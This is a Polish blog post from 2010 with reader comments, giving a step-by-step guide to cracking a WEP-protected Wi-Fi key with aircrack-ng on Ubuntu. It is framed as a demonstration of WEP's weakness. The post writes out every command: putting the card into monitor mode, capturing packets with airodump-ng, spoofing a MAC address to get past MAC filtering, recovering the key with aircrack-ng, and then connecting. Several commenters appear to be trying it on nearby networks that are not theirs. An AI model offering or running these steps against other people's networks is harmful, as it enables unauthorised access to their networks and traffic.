Wpis ten ma na celu pokazanie słabości zabezpieczania sieci wifi kluczem WEP. Mam nadzieję, że niektórych przekona do zmiany szyfrowania na lepsze.
W celu złamania klucza będziemy potrzebowali Linuksa(Ubuntu), bezprzewodowej karty sieciowej oraz odrobiny wolnego czasu ;] Zebranie kilkudziesięciu tysięcy pakietów danych będzie trochę trwało.
1. Instalujemy pakiet aircrack-ng
$ sudo -i
# apt-get update
# apt-get install aircrack-ng
2. Przełączamy kartę sieciową w tryb monitor
Sprawdzamy jak nazywa się nasza karta w systemie :
# ifconfig
eth0 Link encap:Ethernet HWaddr 00:08:54:54:**:**
inet addr:192.168.0.2 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2567 errors:0 dropped:0 overruns:0 frame:0
TX packets:2519 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1973053 (1.9 MB) TX bytes:400436 (400.4 KB)
Interrupt:16 Base address:0xe800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2 errors:0 dropped:0 overruns:0 frame:0
TX packets:2 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:100 (100.0 B) TX bytes:100 (100.0 B)
wlan0 Link encap:UNSPEC HWaddr 00-18-F3-EE-**-**
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3248 (3.2 KB) TX bytes:1800 (1.8 KB)
Wyłączamy kartę sieciową i zmieniamy jej tryb na monitor:
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# ifconfig wlan0 up
3. Zaczynamy zbierać pakiety
# airodump-ng wlan0 -w zzrzut.log
Jeżeli znamy kanał na jakim działa interesująca nas sieć to możemy sprecyzować to poleceniem :
# airodump-ng wlan0 -w zzrzut.log --channel 2
BSSID – adresy MAC AP w pobliżu
Beacons – pakiety kontrolne, zbędna dla nas
Data – pakiety danych
CH – kanał na których AP nadają
ENC – sposoby zabezpieczeń
ESSID – to nazwa danej sieci
MB – prędkość z jaką działa sieć
STATION – adres MAC klienta podłączonego do danej sieci. Może się przydać w sytuacji gdy będzie ustawione filtrowanie po MAC adresach.
Żeby złamać klucz WEP 128bit trzeba złapać ok 80-120tyś pakietów DATA.
4. Wracamy do normalnego trybu karty
# ifconfig wlan0 down
# iwconfig wlan0 mode managet
# ifconfig wlan0 up
Jeżeli wiemy, że dostęp do sieci jest dodatkowo zabezpieczony filtrowaniem po MAC adresach możemy łatwo zmienić nasz MAC na dowolny :
Zanim podniesiemy interfejs wpisujemy :
# ifconfig wlan0 hw ether 00:08:c1:3a:6a:77
Dopiero potem podnosimy naszą kartę :
# ifconfig wlan0 up
5. Zdobywamy hasło.
W tym celu posłużymy się programem aircrack-ng
# aircrack-ng -n 128 zzrzut.log-01.cap
Objaśnienie :
-n 128
– określamy jaki klucz chcemy złamać
zzrzut.log-01.cap
– plik ze zrzutem z programu airodump-ng
Może odpalić drugą konsolę i co jakiś czas sprawdzać czy zebrana ilość danych starczy do odszyfrowania hasła. Nie musimy wtedy nawet przerywać pracy programu airodump-ng.
W moim przypadku wystarczyło zdobyć tylko 50tyś pakietów danych ale i tak zajęło to 44minuty. Fakt, że użyłem proste hasło i specjalnie generowałem ogromny ruch miało duży wpływ na szybkość zebrania danych.
6. Łączymy się z siecią.
Gdy znamy hasło pozostaje nam już tylko ustanowić połączenie przy pomocy NetworkManager’a.
k0
18 Maj, 2010 at 7:13 pm
Mam pytanko w którym miejscu zapisują się te logi?
lazowski
19 Maj, 2010 at 7:39 am
W tym miejscu gdzie masz odpaloną konsolę..
po wydaniu komendy „sudo -i” pewnie będzie to /root/
Data
3 sierpnia, 2010 at 4:41 pm
Po jakim czasie od odpalenia aircracka zaczyna byc zbierana „data”? Niestety zbieraja pakiety danych (data) trwalo to 4 godziny nie zebralem ani jednego. A probowalem na paru dostepnych sieciach. Jak to mozliwe, od czego to zalezy ?
darf
9 września, 2010 at 12:46 pm
Najprawdopodobniej koles hula na kablu lub nie masz dostatecznego zasiegu do jego karty bezprzewodowej.
Data
10 września, 2010 at 12:01 pm
jak koles hula na kablu i jak nie mam zasiegu jak z tego samego zalozmy bloku lacze sie czasami z internetem bez hasla ? A jest tam duzo lacz wireless i zadna nie pobiera data ? Cos mnie sie nie chce wierzyc, zeby tak bylo
lol
28 czerwca, 2011 at 10:15 am
gosciu ale nie okresliles ze mieszkasz w gettcie… a komentarz poprzednika jak najbardziej opisywal zaistniala sytuacje. idac dalej zdecyduj sie czy masz w bloku tylko otwarte sieci czy takze zabezpieczone bo jezeli tylko to pierwsze to dalej jedz po osobach pomagajacych.